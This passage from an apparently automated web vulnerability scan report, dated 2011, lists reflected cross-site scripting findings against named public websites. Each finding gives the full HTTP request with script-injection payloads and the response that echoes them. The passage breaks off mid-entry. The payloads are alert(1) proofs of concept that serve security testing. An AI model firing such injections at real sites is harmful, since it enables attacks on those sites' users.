<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Server Status8d530"><Script>Alert(1)</Script>Decd035a41f - Learn from the experts and community at AboutUs.org" />
...[SNIP]...

2.2. http://www.breitbart.tv/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.breitbart.tv
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba7b0"><script>alert(1)</script>aab5736d382 was submitted in the REST URL parameter 1. This input was echoed as ba7b0\"><script>alert(1)</script>aab5736d382 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusba7b0"><script>alert(1)</script>aab5736d382 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.breitbart.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Age: 0
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 12:12:52 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 12:03:39 GMT
Pragma: no-cache
Server: Apache/2.2.13 (Unix)
Vary: Cookie
Via: 1.1 varnish
X-Node: ch-sv-bb-app1
X-Pingback: http://tv.breitbart.com/xmlrpc.php
X-Powered-By: PHP/5.1.6
X-Server-Processing-Time: D=621923 microseconds
X-Varnish: 389227920
Content-Length: 66859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
<link rel="canonical" href="http://www.breitbart.tv/server-statusba7b0\"><script>alert(1)</script>aab5736d382">
...[SNIP]...

2.3. http://www.buzzillions.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fbafe</title><script>alert(1)</script>51dc9727092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusfbafe</title><script>alert(1)</script>51dc9727092 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:54:27 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 11:54:27 GMT; Path=/
Set-Cookie: lapg=%2Fserver-statusfbafe%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E51dc9727092%3FN%3D0%26D%3Dx%26Ntt%3Dserver-statusfbafe%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E51dc9727092%26top%3Dyes; Expires=Tue, 30-Mar-2021 11:54:27 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 11:54:27 GMT; Path=/
Set-Cookie: bzid=1301745267207; Expires=Tue, 30-Mar-2021 11:54:27 GMT; Path=/
Set-Cookie: JSESSIONID=0E59B00A7B465A96F2985830F4DCAF15.fury1portal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28731

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;server-statusfbafe</title><script>alert(1)</script>51dc9727092&#8221;</title>
...[SNIP]...

2.4. http://www.buzzillions.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39315'%3balert(1)//cc506767d1e was submitted in the REST URL parameter 1. This input was echoed as 39315';alert(1)//cc506767d1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status39315'%3balert(1)//cc506767d1e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:54:24 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Tue, 30-Mar-2021 11:54:24 GMT; Path=/
Set-Cookie: lapg=%2Fserver-status39315%27%3FN%3D0%26D%3Dx%26Ntt%3Dserver-status39315%27%3Balert%281%29%2F%2Fcc506767d1e%26top%3Dyes; Expires=Tue, 30-Mar-2021 11:54:24 GMT; Path=/
Set-Cookie: oref=""; Expires=Tue, 30-Mar-2021 11:54:24 GMT; Path=/
Set-Cookie: bzid=1301745264641; Expires=Tue, 30-Mar-2021 11:54:24 GMT; Path=/
Set-Cookie: JSESSIONID=E9E4EC1DCB0DADD4E83A00B29B34EC72.visionportal; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25034

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('server-status39315';alert(1)//cc506767d1e');</script>
...[SNIP]...

2.5. http://www.cliffsnotes.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55ec1<script>alert(1)</script>09975e326de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status55ec1<script>alert(1)</script>09975e326de HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:06:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//server-status55ec1<script>alert(1)</script>09975e326de</i>
...[SNIP]...

2.6. http://www.cliffsnotes.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cliffsnotes.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da647--><script>alert(1)</script>bbe399773e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?da647--><script>alert(1)</script>bbe399773e2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cliffsnotes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:06:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<LI>da647--><script>alert(1)</script>bbe399773e2 = 1

</UL>
...[SNIP]...

2.7. http://www.colbertnation.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e795"><script>alert(1)</script>bbd5bdf34b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1e795"><script>alert(1)</script>bbd5bdf34b1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colbertnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Type: text/html
Content-Length: 24221
Cache-Control: max-age=3562
Date: Sat, 02 Apr 2011 11:40:17 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <he
...[SNIP]...
<link rel="canonical" href="http://www.colbertnation.com/1e795"><script>alert(1)</script>bbd5bdf34b1" />
...[SNIP]...

2.8. http://www.craveonline.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9370'-alert(1)-'aa120cc403f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd9370'-alert(1)-'aa120cc403f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 11:46:27 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56351
Date: Sat, 02 Apr 2011 11:41:27 GMT
X-Varnish: 1548305106
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy2v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/server-statusd9370'-alert(1)-'aa120cc403f;sect=server-statusd9370'-alert(1)-'aa120cc403f;ct=server-statusd9370'-alert(1)-'aa120cc403f;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

2.9. http://www.craveonline.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 782dd--><a>b8cbf55db90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status782dd--><a>b8cbf55db90 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 11:46:30 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56207
Date: Sat, 02 Apr 2011 11:41:31 GMT
X-Varnish: 877596055
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status782dd--><a>b8cbf55db90 -->
...[SNIP]...

2.10. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 89416--><a>aa1cc4eed48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?89416--><a>aa1cc4eed48=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 11:45:36 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56279
Date: Sat, 02 Apr 2011 11:40:36 GMT
X-Varnish: 877594024
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 server-status?89416--><a>aa1cc4eed48=1 -->
...[SNIP]...

2.11. http://www.craveonline.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1118e'-alert(1)-'e109d638d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?1118e'-alert(1)-'e109d638d69=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 11:45:32 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/html; charset=UTF-8
Content-Length: 56418
Date: Sat, 02 Apr 2011 11:40:34 GMT
X-Varnish: 2125410714
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy2v.sb.lax2

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 02-23-11, 18:23:08 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/server-status?1118e'-alert(1)-'e109d638d69=1;sect=server-status?1118e'-alert(1)-'e109d638d69=1;ct=server-status?1118e'-alert(1)-'e109d638d69=1;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

2.12. http://www.davidsbridal.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.davidsbridal.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c5d<img%20src%3da%20onerror%3dalert(1)>c45223c93a6 was submitted in the REST URL parameter 1. This input was echoed as 13c5d<img src=a onerror=alert(1)>c45223c93a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status13c5d<img%20src%3da%20onerror%3dalert(1)>c45223c93a6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.davidsbridal.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 12:04:05 GMT
Content-Length: 1023
Connection: close
Set-Cookie: JSESSIONID=0000EtqTTV571cfGF9DptSXOvpk:13e3kbpel; Path=/


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>
       Generic Application Error Test JSP (Item)
   </title>
</head>
<BODY>
<H1>
   Generic Application Error
</H1>

<BR>


...[SNIP]...
<TD>Command not found: "server-status13c5d<img src=a onerror=alert(1)>c45223c93a6".</TD>
...[SNIP]...

2.13. http://www.dummies.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dummies.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ee74<script>alert(1)</script>9d7f21751d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status3ee74<script>alert(1)</script>9d7f21751d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dummies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 11:49:31 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<i>/WileyCDA//server-status3ee74<script>alert(1)</script>9d7f21751d</i>
...[SNIP]...

2.14. http://www.dummies.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dummies.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3afad--><script>alert(1)</script>b56567668b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?3afad--><script>alert(1)</script>b56567668b5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dummies.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 11:49:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<LI>3afad--><script>alert(1)</script>b56567668b5 = 1

</UL>
...[SNIP]...

2.15. http://www.ea.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ea.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7581b"><script>alert(1)</script>bc8d8474589 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

2.16. http://www.ecnext.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd672<script>alert(1)</script>127c627d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cd672<script>alert(1)</script>127c627d58 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 11:48:51 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2507
X-Varnish: 3115763906
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<br>
Access Denied: http://www.ecnext.com/cd672<script>alert(1)</script>127c627d58 at Sat Apr 2 07:48:51 2011 from 173.193.214.243<br>
...[SNIP]...

2.17. http://www.ecnext.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecnext.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d5e"><script>alert(1)</script>e11ba8f4b87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /72d5e"><script>alert(1)</script>e11ba8f4b87 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ecnext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 11:48:50 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Set-Cookie: tcc=one; path=/
Content-Length: 2513
X-Varnish: 2363285963
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>403 - Access Denied</title>

...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/72d5e"><script>alert(1)</script>e11ba8f4b87 at Sat Apr 2 07:48:50 2011 from 173.193.214.243">
...[SNIP]...

2.18. http://www.elyricsworld.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload e153f</title><script>alert(1)</script>e9fcdc9ddc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statuse153f</title><script>alert(1)</script>e9fcdc9ddc5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 18:16:12 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1423
Content-Type: text/html

<html>
   <head>
       <title>/server-statuse153f</title><script>alert(1)</script>e9fcdc9ddc5 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...

2.19. http://www.elyricsworld.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a564<script>alert(1)</script>98c0ca39ef5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status1a564<script>alert(1)</script>98c0ca39ef5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 18:16:11 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1407
Content-Type: text/html

<html>
   <head>
       <title>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   
...[SNIP]...
<h1>/server-status1a564<script>alert(1)</script>98c0ca39ef5 not found on elyricsworld.com</h1>
...[SNIP]...

2.20. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload f0ca2</title><script>alert(1)</script>c3ed3e5c06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?f0ca2</title><script>alert(1)</script>c3ed3e5c06f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 18:16:09 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1429
Content-Type: text/html

<html>
   <head>
       <title>/server-status?f0ca2</title><script>alert(1)</script>c3ed3e5c06f=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
...[SNIP]...

2.21. http://www.elyricsworld.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0cc5<script>alert(1)</script>a9257fdb58c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 18:16:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1413
Content-Type: text/html

<html>
   <head>
       <title>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/server-status?b0cc5<script>alert(1)</script>a9257fdb58c=1 not found on elyricsworld.com</h1>
...[SNIP]...

2.22. http://www.foodandwine.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.foodandwine.com
Path:   /server-status

Issue detail

